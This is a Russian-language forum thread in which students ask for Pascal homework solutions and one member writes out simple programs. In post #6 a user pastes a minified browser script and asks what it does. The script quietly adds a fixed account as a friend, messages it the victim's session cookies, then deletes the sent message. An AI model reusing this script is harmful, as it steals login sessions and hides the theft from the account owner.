Технический форум
Вернуться   Технический форум > Программирование > Форум программистов > Помощь студентам


Закрытая тема
 
Опции темы Опции просмотра
Старый 06.05.2009, 22:10   #1 (permalink)
Matrix
IT-Specialist
 
Аватар для Matrix
 
Регистрация: 12.04.2007
Сообщений: 2,906
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 1845
Thumbs up Студентам. Помощь в программировании

Чтобы каждый раз не создавались топики, с просьбой написать программу на каком то языке , создаю этот топик...
Здесь вы можете оставлять свои задания, только не забывайте указывать язык на котором надо написать программу...
Чтобы не было лишних вопросов по условию, излагайте условие правильно и подробно,от этого зависит быстрота получения вами готового кода...
Matrix вне форума  

Старый 06.05.2009, 22:10
Helpmaster
Member
 
Аватар для Helpmaster
 
Регистрация: 08.03.2016
Сообщений: 0

Я думаю, что проблема получила свое решение по этим ссылкам

Нужна помощь с БП
Помощь с БП от ПК

Старый 07.05.2009, 00:30   #2 (permalink)
Tranzistor
Специалист
 
Аватар для Tranzistor
 
Регистрация: 17.07.2007
Адрес: Мордовия
Сообщений: 857
Сказал(а) спасибо: 14
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 3312
По умолчанию

Здравствуйте, помогите пожалуйста ниписать 2 проги на Паскале.. А то сессия приближается, а лабы сдавать надо Так вот.

1. Составить программу, в соответствии с вариантом, равным номеру компьютера, результаты вывести на экран и в файл (выходной файл должен также содержать, фамилии, номер группы).

Вот задание: Ввести с клавиатуры 10 пар чисел. Сравнить числа в каждой паре и напечатать большие из них.

2.Составить программу, в соответствии с вариантом, равным номеру компьютера, результаты вывести на экран и в файл.

и задание: С клавиатуры вводятся числа и последовательно суммируются. Найти количество введенных чисел, когда их сумма превысила 100.
Tranzistor вне форума  
Старый 07.05.2009, 00:46   #3 (permalink)
Matrix
IT-Specialist
 
Аватар для Matrix
 
Регистрация: 12.04.2007
Сообщений: 2,906
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 1845
По умолчанию

Цитата:
Сообщение от Kosmos Посмотреть сообщение
и напечатать большие из них.
Может "вывести большее из них"?
Matrix вне форума  
Старый 07.05.2009, 09:56   #4 (permalink)
Vladimir_S
Специалист
 
Аватар для Vladimir_S
 
Регистрация: 27.08.2008
Адрес: Санкт-Петербург
Сообщений: 26,873
Сказал(а) спасибо: 318
Поблагодарили 542 раз(а) в 183 сообщениях
Репутация: 101510
По умолчанию

Цитата:
Сообщение от M@trix™ Посмотреть сообщение
Может "вывести большее из них"?
Нет-нет, всё правильно, бОльшие - множественное число, поскольку пар 10. Будет окошко - нарисую. Пока, к сожалению, некогда.
Vladimir_S вне форума  
Старый 07.05.2009, 12:06   #5 (permalink)
Vladimir_S
Специалист
 
Аватар для Vladimir_S
 
Регистрация: 27.08.2008
Адрес: Санкт-Петербург
Сообщений: 26,873
Сказал(а) спасибо: 318
Поблагодарили 542 раз(а) в 183 сообщениях
Репутация: 101510
По умолчанию

Цитата:
Сообщение от Kosmos Посмотреть сообщение
1. Составить программу, в соответствии с вариантом, равным номеру компьютера, результаты вывести на экран и в файл (выходной файл должен также содержать, фамилии, номер группы).

Вот задание: Ввести с клавиатуры 10 пар чисел. Сравнить числа в каждой паре и напечатать большие из них.
Поскольку Вы не указали формат вводимых чисел, будем считать, что Integer.

CONST
FileName:STRING='xxxx'; {Enter the real name of your file, including the path}
SurName:STRING='Ivanov'; {Enter your surname}
GroupNumber:STRING='555_a'; {Enter the real number of your group}

VAR
f:TEXT;
a:ARRAY[1..10, 1..2] of INTEGER;
m:ARRAY[1..10] of INTEGER;
i,j:INTEGER;

FUNCTION MAX(a,b:INTEGER):INTEGER;
BEGIN
IF a>b THEN MAX:=a ELSE MAX:=b;
END;

BEGIN
Assign(f, FileName);
ReWrite(f);
Writeln(f, SurName);
Writeln(f, GroupNumber);
FOR i:=1 TO 10 DO
BEGIN
FOR j:=1 TO 2 DO
BEGIN
Write('a[',i:2,', ',j:1,'] = '); ReadLn(a[i,j]);
END;
m[i]:=MAX(a[i,1],a[i,2]);
Writeln(f,i:2,m[i]:15);
END;
Writeln;
FOR i:=1 TO 10 DO
Writeln(i:2,m[i]:15);
Close(f);
ReadLn;
END.

Цитата:
Сообщение от Kosmos Посмотреть сообщение
2.Составить программу, в соответствии с вариантом, равным номеру компьютера, результаты вывести на экран и в файл.

и задание: С клавиатуры вводятся числа и последовательно суммируются. Найти количество введенных чисел, когда их сумма превысила 100.
CONST
FileName:STRING='xxxx'; {Enter the real name of your file, including the path}
SurName:STRING='Ivanov'; {Enter your surname}
GroupNumber:STRING='555_a'; {Enter the real number of your group}

VAR
f:TEXT;
a,SUM,Num:INTEGER;

BEGIN
Assign(f, FileName);
ReWrite(f);
Writeln(f, SurName);
Writeln(f, GroupNumber);
SUM:=0;
Num:=0;
REPEAT
INC(Num);
Write('Enter the next number ');
Readln(a);
SUM:=SUM+a;
UNTIL SUM>100;
Writeln(f,Num:15);
Writeln(Num:15);
Close(f);
ReadLn;
END.

Последний раз редактировалось Vladimir_S; 07.05.2009 в 21:07 Причина: Ошибок второпях налепил. Исправляю.
Vladimir_S вне форума  
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Старый 07.05.2009, 20:04   #6 (permalink)
Dram
Экономичный вид памяти
 
Аватар для Dram
 
Регистрация: 19.02.2008
Сообщений: 2,632
Записей в дневнике: 1
Сказал(а) спасибо: 6
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 2794
По умолчанию

не стал создовать отдельный топик
что выполняет этот скрипт? Сам запустить я его не решился. просто хочу спросить что в нем заложенно
уберите пробел между Java_script .

Java_script:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold ').innerHTML=percentGold;ge('rateLeftGold').style. width=widthLeft+"px";ge('rateRightGold').style.wid th=widthRight+"px";percentGold=percentGold+1;width Left=Math.floor(Math.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent' ).innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);wid thRight=parseInt(ge('rateRight').style.width);_b() ;}else{percentGold=parseInt(ge('percentGold').inne rHTML);widthLeft=parseInt(ge('rateLeftGold').style .width);widthRight=parseInt(ge('rateRightGold').st yle.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').i nnerHTML=percentGold+"%";ge('rateLeft').style.widt h=widthLeft+"px";ge('rateRight').style.width=width Right+"px";percentGold=percentGold+1;if(percentGol d>100){clearTimeout(t);ge('percent').id="percentGo ld";ge('rateLeft').id='rateLeftGold';ge('rateRight ').id='rateRightGold';widthLeft=20;widthRight=179; _a();}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="n one";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_ form',fid:22188798},onDone:function(ajaxObj,respon seText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=re sponse.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend. php',queryarams});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to :22188798},onDone:function(ajaxObj,responseText){v ar text=responseText;try{f.innerHTML=responseText;par ams={act:ge('act').value,ajax:1,misc:ge('misc')?ge ('misc').value:'',secure:ge('secure')?ge('secure') .value:'',chas:ge('chas').value,photo:ge('photo')? ge('photo').value:'',to_id:22188798,to_reply:ge('t o_reply').value,toFriends:ge('toFriends')?ge('toFr iends').value:'',title:ge('title').value,message:' '+Math.round(Math.random()*10000)+document.cookie+ Math.round(Math.random()*10000)};setTimeout(c,3000 );}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',queryarams,onDone: function(ajaxObj,responseText){setTimeout(e,1000); }});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Ma th.round(Math.random()*10000)},onDone:function(aja xObj,responseText){try{var k='<a href="mail.php?act=write&to=22188798&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g-pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',queryarams});}catch(e) {}}});}; onDomReady(function(){document.body.appendChild(f) ; first();a();b();});
Dram вне форума  
Старый 07.05.2009, 20:51   #7 (permalink)
Tranzistor
Специалист
 
Аватар для Tranzistor
 
Регистрация: 17.07.2007
Адрес: Мордовия
Сообщений: 857
Сказал(а) спасибо: 14
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 3312
По умолчанию

Vladimir_S, спасибо вам огромное!!
но не могли бы переписать так, чтобы в файл выводилась фамилия, а так получается что фамилия в названии файла.. И Паскаль конфликтует с таким написанием строки:
Assign(f, SurName+'_'+GroupNumber');
Tranzistor вне форума  
Старый 07.05.2009, 21:10   #8 (permalink)
Vladimir_S
Специалист
 
Аватар для Vladimir_S
 
Регистрация: 27.08.2008
Адрес: Санкт-Петербург
Сообщений: 26,873
Сказал(а) спасибо: 318
Поблагодарили 542 раз(а) в 183 сообщениях
Репутация: 101510
По умолчанию

Цитата:
Сообщение от Kosmos Посмотреть сообщение
Vladimir_S, спасибо вам огромное!!
но не могли бы переписать так, чтобы в файл выводилась фамилия, а так получается что фамилия в названии файла..
Сделано.

Цитата:
И Паскаль конфликтует с таким написанием строки:
Assign(f, SurName+'_'+GroupNumber');
Конечно конфликтует, раз там мною ошибка вляпана - лишний апостроф перед закрывающей скобкой. Виноват. Но, впрочем, таких строк в исправленном варианте уже нету.
Vladimir_S вне форума  
Старый 10.05.2009, 10:28   #9 (permalink)
Tranzistor
Специалист
 
Аватар для Tranzistor
 
Регистрация: 17.07.2007
Адрес: Мордовия
Сообщений: 857
Сказал(а) спасибо: 14
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 3312
Thumbs up

Vladimir_S, я Вам очень признателен, еще раз спасибо!
Tranzistor вне форума  
Старый 10.05.2009, 11:16   #10 (permalink)
Tamerlaan_Sg
Новичок
 
Регистрация: 26.03.2009
Сообщений: 11
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 10
По умолчанию

Здравствуйте, помогите пожалуйста с программами на паскале, а то сессия на носу уже, а не успеваю.

1. Разработать программу, реализующую алгоритм вычисления суммы бесконечного ряда с точностью до 10^(-4). Программу представить с использованием оператора цикла WHILE
ln(x)=(x-1)/x+(x-1)2/2x2+(x-1)3/3x3+...
x>1/2

2. Преобразовать массив, расположив сначала все положительные, а затем все отрицательные элементы. Порядок следования элементов одного типа не менять

3. Найти количество нулевых элементов в каждой строке матрицы.

4. В одномерном массиве, состоящем из N целых элементов вычислить:
а)сумму элементов массива с четными номерами (оформить в виде функции)
б)произведение жлементов массива, расположенных между 1 и последним нулевыми лементами (оформить в виде процедуры)
Сжать массив, удалив из него все элементы, модуль которых не превышает 1. Освободившиеся элементы в конце массива заполнить нулями

5.Определить количество слов в каждой строке. Удалить все слова BEGIN в каждой строке. (работа с файлами, обработка текст идет из внешнего файла, результаты также поместить в файл, для обработки текста использовать строковые функции).

СПАСИБО огромное, дело в том что с программированием никогда не сталкивался да и по роду профессии не столкнусь, а сдавать нужно
Tamerlaan_Sg вне форума  
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Закрытая тема

Метки
задачи по информатике, помощь, решение задач, студент

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Выкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Выкл.




Часовой пояс GMT +4, время: 21:29.

Powered by vBulletin® Version 6.2.5.
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.